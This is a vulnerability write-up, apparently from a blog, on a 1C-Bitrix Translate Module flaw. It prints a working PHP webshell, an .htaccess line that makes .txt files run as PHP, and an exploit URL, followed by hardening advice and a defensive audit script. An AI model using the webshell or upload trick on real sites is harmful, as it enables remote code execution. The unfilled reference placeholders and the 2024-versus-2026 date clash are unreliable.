TL;DR: If you’re running 1C-Bitrix (up to version 25.100.500), be aware: anyone with SOURCE/WRITE permissions on the Translate Module can upload a PHP file and a tailored .htaccess to run unauthorized code. 1C-Bitrix claims “power users are supposed to have this”; we disagree. Here’s how an attacker could abuse this “feature.”

What’s Happening — Simple Version

1C-Bitrix is a popular CMS in Russia and Eastern Europe. The Translate Module lets users help translate or localize web content.

With high enough permissions (SOURCE/WRITE), a user is meant to add new language files. But that means they can upload *any* file — not just safe ones. This is where CVE-2025-67887 comes in: By uploading a malicious PHP file (and a smart .htaccess), an attacker can turn translation into total takeover.

> Reference: NVD entry for CVE-2025-67887 (Note: Replace with actual when published. None as of June 2024.)

Step-By-Step Exploit Breakdown

Let’s see how this works in reality, with fresh, easy-to-follow snippets.

1. Get the Right Permissions

First, the attacker needs SOURCE/WRITE permissions on the Translate Module. Often, this could be a translator role — not always a full admin.

2. Craft a PHP Webshell

Any simple PHP shell will do. Here’s one that echoes back command output — a time-proven favorite:

<?php
if(isset($_GET["cmd"])) {
    system($_GET["cmd"]);
}
?>

3. Prepare a .htaccess File

Some servers don’t parse .php files (for example, if you’re supposed to upload only .txt or .xml). To make sure your upload is treated as PHP, add a .htaccess with:

AddType application/x-httpd-php .txt .php

4. Upload Files via Translate Module

Using the UI (or the API), upload both shell.php and the .htaccess file into the language/ folder (or wherever the module stores translation files).

Visit

https://victim-site.com/bitrix/modules/translate/language/shell.php?cmd=whoami

Or whatever the real path is. Replace whoami with any command.

Why This is a REAL Problem

- Privilege Escalation: Sometimes a site might delegate translation to users who shouldn’t be able to execute code.

Supplier’s Response (And Why It’s Not Enough)

Bitrix recognizes that “translators” with SOURCE/WRITE are powerful. Their claim: “Uploading PHP files is intended for high-privileged users.”

But:

- There’s no warning about RCE risk in docs or interface.

- Defense in depth is missing — even privileged user actions should be restricted from RCE by accident or intent.

How to Defend

- Strict Permissions: Only give Translate Module SOURCE/WRITE to top admins you absolutely trust.

- Segregate Translation: Use external tools, and import only verified files.

- WAF/ModSecurity: Block suspicious .php URLs in this directory if possible.
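
To back up the "import only verified files" advice, here is an audit script for the directory where translation uploads land. It is an added example, not code from 1C-Bitrix or from the original write-up. It flags any .htaccess file, noting when it remaps the PHP handler the way the AddType line above does, and any data file that contains a PHP open tag. The directory layout, the list of data extensions and the sample files are constructed assumptions.

```python
import os
import re
import tempfile

# Apache directives that can remap which extensions the PHP handler executes.
HANDLER_RE = re.compile(
    rb"^\s*(AddType|AddHandler|SetHandler|ForceType)\b.*(php|x-httpd)", re.I | re.M)
# Full and echo open tags only; a bare "<?" would also match "<?xml".
PHP_TAG_RE = re.compile(rb"<\?(php|=)", re.I)
# Extensions expected to hold data only (assumption; adjust to your import format).
DATA_EXTS = {".txt", ".xml", ".csv", ".json"}


def audit_upload_dir(root):
    """Return sorted (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as fh:
                data = fh.read(1_000_000)  # cap bytes inspected per file
            ext = os.path.splitext(name)[1].lower()
            if name.lower() == ".htaccess":
                remaps = HANDLER_RE.search(data)
                reason = "htaccess-remaps-php-handler" if remaps else "htaccess-present"
                findings.append((rel, reason))
            elif ext in DATA_EXTS and PHP_TAG_RE.search(data):
                findings.append((rel, "php-tag-in-data-file"))
    return sorted(findings)


def demo():
    """Build a constructed sample tree and audit it."""
    with tempfile.TemporaryDirectory() as root:
        samples = {
            "en/menu.xml": b"<?xml version='1.0'?><items><item>Home</item></items>",
            "en/notes.txt": b"<?php /* constructed marker, no payload */ ?>",
            ".htaccess": b"AddType application/x-httpd-php .txt .php\n",
        }
        for rel, body in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(body)
        return audit_upload_dir(root)


if __name__ == "__main__":
    print(demo())
```

Point audit_upload_dir() at the real upload path from a scheduled job or deploy check and alert on any finding; a clean translation directory should return an empty list.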

Real-World Implications

This bug lets any *trusted* but perhaps careless, compromised, or disgruntled translator potentially get root-on-the-webserver. Even if this is “meant to be” for admins, history shows such paths often lead to big problems.

More Info & References

- 1C-Bitrix Translate Module Docs
- Example PHP Webshells
- OWASP File Upload Cheat Sheet

Mitre entry on CVE-2025-67887: (link to be added when available)

Summary

CVE-2025-67887 in 1C-Bitrix is a potent RCE flaw hiding in plain sight. The “feature” is really a misfeature if you ever hand out Translate Module write access to anyone less than fully trusted — *which happens*. Don’t get caught by surprise: audit your users, restrict uploads, and consider alternate translation infrastructure.

Timeline

Published on: 05/08/2026 00:00:00 UTC
Last modified on: 05/08/2026 07:16:28 UTC